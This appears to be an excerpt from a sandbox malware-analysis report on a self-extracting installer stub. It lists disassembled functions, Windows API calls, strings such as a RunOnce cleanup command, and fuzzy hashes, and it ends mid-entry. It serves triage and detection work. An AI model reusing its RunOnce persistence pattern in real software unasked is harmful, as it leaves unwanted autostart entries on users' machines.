Instruction ID: 86b9359919616d37c1e98085e740b5dda12ac982e481b555a253be1102ead285
Opcode Fuzzy Hash: d2d473a5d8bbec4d176ff74ed60f25bb6716ce89d6460ba428292dd9338931bb
Instruction Fuzzy Hash: B941A7759011186FDB249B55EC45AEE77BDEF25700F0440EBF645F2210DB704E869FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00ED22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00ED22D8
memset.MSVCRT ref: 00ED22F5
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00ED2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00ED236E
RegCloseKey.ADVAPI32(?), ref: 00ED237A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED2321
wextract_cleanup2, xrefs: 00ED227C, 00ED22CD, 00ED2363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00ED2299
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00ED232D

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
API String ID: 3027380567-1720115735
Opcode ID: 86127c6ac92214eb6038ea398ac0611f5cf9a52d5e966f80ce514da24bff46e3
Instruction ID: ee9e2f95315616946b712c05ac1909c4e65b2cd7b0e64a6e244a30b2887a7c51
Opcode Fuzzy Hash: 86127c6ac92214eb6038ea398ac0611f5cf9a52d5e966f80ce514da24bff46e3
Instruction Fuzzy Hash: C031F971A012186FDB219B51EC49FEAB77CEF54700F0401EBF54DB6151EA706F8ACA50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00ED313B
GetDesktopWindow.USER32 ref: 00ED314B
SetDlgItemTextA.USER32(?,00000834), ref: 00ED316A
SetWindowTextA.USER32(?,smo), ref: 00ED3176
SetForegroundWindow.USER32(?), ref: 00ED317D
GetDlgItem.USER32(?,00000834), ref: 00ED3185
GetWindowLongA.USER32(00000000,000000FC), ref: 00ED3190
SetWindowLongA.USER32(00000000,000000FC,00ED30C0), ref: 00ED31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00ED31CA

Strings

smo, xrefs: 00ED3170

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: smo
API String ID: 3785188418-2762499640
Opcode ID: 53ec9b76db9b671e6a1a03789b298ff4a57e9f78fe1e6582f6469b1de2a51f5f
Instruction ID: 071ba4f6f5c1b9c73aa64edd978017541300b8ee0164208eb8b27f036ce143d6
Opcode Fuzzy Hash: 53ec9b76db9b671e6a1a03789b298ff4a57e9f78fe1e6582f6469b1de2a51f5f
Instruction Fuzzy Hash: AC11AF31247222BFDB115F36BC0CB9A3B64EB4A725F142623F855B22E0DB71974AC647

Uniqueness

Uniqueness Score: -1.00%

Function 00ED18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00ED18DD), ref: 00ED181A
Part of subcall function 00ED17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00ED182C
Part of subcall function 00ED17EE: AllocateAndInitializeSid.ADVAPI32(00ED18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00ED18DD), ref: 00ED1855
Part of subcall function 00ED17EE: FreeSid.ADVAPI32(?,?,?,?,00ED18DD), ref: 00ED1883
Part of subcall function 00ED17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00ED18DD), ref: 00ED188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00ED18EB
OpenProcessToken.ADVAPI32(00000000), ref: 00ED18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00ED190A
GetLastError.KERNEL32 ref: 00ED1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00ED192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00ED1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00ED1964
EqualSid.ADVAPI32(00000004,?), ref: 00ED197A
FreeSid.ADVAPI32(?), ref: 00ED199C
LocalFree.KERNEL32(00000000), ref: 00ED19A3
CloseHandle.KERNEL32(?), ref: 00ED19AD

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: be4387e4eaa8d4d2447bbf3d0f7249e7bd58790e5ba40aa8b5a60af1604fef43
Instruction ID: 362ddebe4e25043d87024961ab45fc26bbd29553964a93a753902ded04f03e76
Opcode Fuzzy Hash: be4387e4eaa8d4d2447bbf3d0f7249e7bd58790e5ba40aa8b5a60af1604fef43
Instruction Fuzzy Hash: 20316D71A01209BFDB209FA6ED58AAFBBBDFF44304F141466E541F2250D731990ACB21

Uniqueness

Uniqueness Score: -1.00%

Function 00ED468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
memcpy_s.MSVCRT ref: 00ED46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

Strings

TITLE, xrefs: 00ED469D, 00ED46C0
smo, xrefs: 00ED46E4

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$smo
API String ID: 3370778649-3033500379
Opcode ID: 733893491ae6e24437ddfdee4ed141954ed29f9dd7aa110a25f7611764c39999
Instruction ID: 3f81c5bf77d1f7088aad9f9072a07feffd6a61a35b9be052f006b77e5b124b4b
Opcode Fuzzy Hash: 733893491ae6e24437ddfdee4ed141954ed29f9dd7aa110a25f7611764c39999
Instruction Fuzzy Hash: D801D6732412007FE31017A6BC0DF6B3F2CDBC6B52F084026FB4AB6290C971CA4582A2

Uniqueness

Uniqueness Score: -1.00%

Function 00ED681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00ED686E
GetSystemMetrics.USER32(0000004A), ref: 00ED68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00ED68CC
RegQueryValueExA.ADVAPI32(?,00ED1140,00000000,?,?,0000000C), ref: 00ED68F4
RegCloseKey.ADVAPI32(?), ref: 00ED6902

Part of subcall function 00ED66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00ED691A), ref: 00ED6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00ED68C2
;F, xrefs: 00ED6940

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-574545411
Opcode ID: deb9f1ef5f94541d7de86030bff75a5971c56807d13699c15e0bc617b4502575
Instruction ID: 17644c7a1aae5cea20ef1c42122479a2facff5b164ea1e63ddb913e7ced36b36
Opcode Fuzzy Hash: deb9f1ef5f94541d7de86030bff75a5971c56807d13699c15e0bc617b4502575
Instruction Fuzzy Hash: FE319831A02318DFDB31DB56DC14BAA7779EB85718F0411A7E94DB2250D7309E8ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 00ED17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00ED18DD), ref: 00ED181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00ED182C
AllocateAndInitializeSid.ADVAPI32(00ED18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00ED18DD), ref: 00ED1855
FreeSid.ADVAPI32(?,?,?,?,00ED18DD), ref: 00ED1883
FreeLibrary.KERNEL32(00000000,?,?,?,00ED18DD), ref: 00ED188A

Strings

CheckTokenMembership, xrefs: 00ED1826
advapi32.dll, xrefs: 00ED1810

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 721b2e062cdabd06141e6ba4c85e0757d02f2adff5845f246932ccc2cb5448f3
Instruction ID: 17a638ed8d64020c0e9a491aeafdfdf202d02cabb32edb23696cbcb13cdb7c7c
Opcode Fuzzy Hash: 721b2e062cdabd06141e6ba4c85e0757d02f2adff5845f246932ccc2cb5448f3
Instruction Fuzzy Hash: 59118E35E01209AFDB149FA5EC49ABEBBB8EF48701F14016BFA01F6390DA308D058B91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 00ED3490
GetDesktopWindow.USER32 ref: 00ED349A
SetWindowTextA.USER32(?,smo), ref: 00ED34B2
SetDlgItemTextA.USER32(?,00000838), ref: 00ED34C4
SetForegroundWindow.USER32(?), ref: 00ED34CB
EndDialog.USER32(?,00000002), ref: 00ED34D8

Strings

smo, xrefs: 00ED34AC

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: smo
API String ID: 852535152-2762499640
Opcode ID: 209ca3fcb976de37c99a686aee3a971c15a7174d68eaa3cbff37d5001f04687f
Instruction ID: 51785dac417b976bba05b44b74568cc7a767f16d77ea23da66eb97486e1c81f1
Opcode Fuzzy Hash: 209ca3fcb976de37c99a686aee3a971c15a7174d68eaa3cbff37d5001f04687f
Instruction Fuzzy Hash: 9D019271242125AFC7165F76FC0C9AE3B65EB05701F146023F966B66A1C7398F43C782

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00ED2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00ED2AF2
CharNextA.USER32(?), ref: 00ED2B12
CharUpperA.USER32 ref: 00ED2B1E
CharPrevA.USER32(?,?), ref: 00ED2B55
CharNextA.USER32(?), ref: 00ED2BD4

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: d758e061d4c4887d51f3ed634b677d0b0c4bc5458089238c6b1bf97ff0570297
Instruction ID: 35b47c05d03f5e1bbf56b7354b86d102d08cfbc457ca02d5f042f6b223b81cb2
Opcode Fuzzy Hash: d758e061d4c4887d51f3ed634b677d0b0c4bc5458089238c6b1bf97ff0570297
Instruction Fuzzy Hash: 7F41F0346052455EDB159F349C14AFD7BA9DF66304F0810EFE8C2A7302DBA58E8B8B60

Uniqueness

Uniqueness Score: -1.00%

Function 00ED28E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00ED2A6F

Part of subcall function 00ED2773: CharUpperA.USER32(72E96697,00000000,00000000,00000000), ref: 00ED27A8
Part of subcall function 00ED2773: CharNextA.USER32(0000054D), ref: 00ED27B5
Part of subcall function 00ED2773: CharNextA.USER32(00000000), ref: 00ED27BC
Part of subcall function 00ED2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED2829
Part of subcall function 00ED2773: RegQueryValueExA.ADVAPI32(?,00ED1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED2852
Part of subcall function 00ED2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED2870
Part of subcall function 00ED2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00ED3938,?,?,?,?,-00000005), ref: 00ED2958
GlobalLock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ED3938,?,?,?,?,-00000005,?), ref: 00ED2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ED3938,?,?,?,?,-00000005,?), ref: 00ED2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00ED3938,?,?), ref: 00ED2A81

Strings

89, xrefs: 00ED293D, 00ED297E, 00ED2940

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 89
API String ID: 3949799724-2925746602
Opcode ID: f429ff6ec800d1e7025bcc7669beca914c6d81505a879f68e0d58069c933c779
Instruction ID: 888566e713d75d5df4ef0f2eaa1b8618307bbd14f7c7406228985c4f8214f013
Opcode Fuzzy Hash: f429ff6ec800d1e7025bcc7669beca914c6d81505a879f68e0d58069c933c779
Instruction Fuzzy Hash: 2A511731900219DFCB21DF99D884AAEBBB5FF58705F14502AEA15F7311D7319A42DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00ED43F1
GetWindowRect.USER32(00000000,?), ref: 00ED440B
GetDC.USER32(?), ref: 00ED4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00ED442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00ED443A
ReleaseDC.USER32(?,00000000), ref: 00ED4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00ED44A2

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 4dc5997743808b20a7b9dac0a4cb799cca9838f1eda65d3ec3d0b77e6d1a189b
Instruction ID: c702d6fc467c47b9d40106b2126f6b44d78453c1bd689e3d3cdf97ba351d5478
Opcode Fuzzy Hash: 4dc5997743808b20a7b9dac0a4cb799cca9838f1eda65d3ec3d0b77e6d1a189b
Instruction Fuzzy Hash: 80316272E01119AFCB14CFB9DD489EEBBB5EB89310F15416AF805F3240DA306D45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00ED171E: _vsnprintf.MSVCRT ref: 00ED1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00ED51CA,00000004,00000024,00ED2F71,?,00000002,00000000), ref: 00ED62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00ED51CA,00000004,00000024,00ED2F71,?,00000002,00000000), ref: 00ED62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00ED51CA,00000004,00000024,00ED2F71,?,00000002,00000000), ref: 00ED631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00ED6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00ED51CA,00000004,00000024,00ED2F71,?,00000002,00000000), ref: 00ED6357

Strings

UPDFILE%lu, xrefs: 00ED62B3, 00ED6329

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: cd5b6cc746afef10033130d2e8d3e04a075c9031c38bb17f680725f4d53b8287
Instruction ID: 5648b8664b5ad5cab5319f08c88e139f884242ab89d01a8a3eddeea670e23b62
Opcode Fuzzy Hash: cd5b6cc746afef10033130d2e8d3e04a075c9031c38bb17f680725f4d53b8287
Instruction Fuzzy Hash: DB21D071A01219AFDB109FA59C459FEBB78EB89714B04112BE902B3351DB359E068BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
Part of subcall function 00ED468F: SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
Part of subcall function 00ED468F: LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
Part of subcall function 00ED468F: LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
Part of subcall function 00ED468F: memcpy_s.MSVCRT ref: 00ED46E5
Part of subcall function 00ED468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00ED2F64,?,00000002,00000000), ref: 00ED3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00ED3AB3

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Part of subcall function 00ED6285: GetLastError.KERNEL32(00ED5BBC), ref: 00ED6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00ED3AD0
LocalFree.KERNEL32 ref: 00ED3B13

Part of subcall function 00ED6517: FindResourceA.KERNEL32(00ED0000,000007D6,00000005), ref: 00ED652A
Part of subcall function 00ED6517: LoadResource.KERNEL32(00ED0000,00000000,?,?,00ED2EE8,00000000,00ED19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00ED6538
Part of subcall function 00ED6517: DialogBoxIndirectParamA.USER32(00ED0000,00000000,00000547,00ED19E0,00000000), ref: 00ED6557
Part of subcall function 00ED6517: FreeResource.KERNEL32(00000000,?,?,00ED2EE8,00000000,00ED19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00ED6560

LocalFree.KERNEL32(00000000,00ED3100,00000000,00000000), ref: 00ED3AF4

Strings

<None>, xrefs: 00ED3AC5
LICENSE, xrefs: 00ED3A46

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 0f2a8813cbea080f3098e4f2d05e5d6e2ee7945af72271fd4abb10714c1ec602
Instruction ID: 3ca7c001dfa5f8f2a3af27a1b35aebd8b917f5e9ede47e00eb0cc7685c1c798f
Opcode Fuzzy Hash: 0f2a8813cbea080f3098e4f2d05e5d6e2ee7945af72271fd4abb10714c1ec602
Instruction Fuzzy Hash: 441181703022016FD7206F37BD09E173BAADBD5700B10642FB541F97E1DA7989069622

Uniqueness

Uniqueness Score: -1.00%

Function 00ED24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00ED2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00ED252C
_lopen.KERNEL32(?,00000040), ref: 00ED253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00ED254C
_lclose.KERNEL32(00000000), ref: 00ED2555

Strings

wininit.ini, xrefs: 00ED2510

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 11dfa9d3d27f0acafb8d26f6eaabb9b7356a3f96fdfd9f22c1b2cf39689ee6c7
Instruction ID: c9e9494bb215a28c377713b5c8df2b8a006e8aa4d91c1d95b27232f8513a2f29
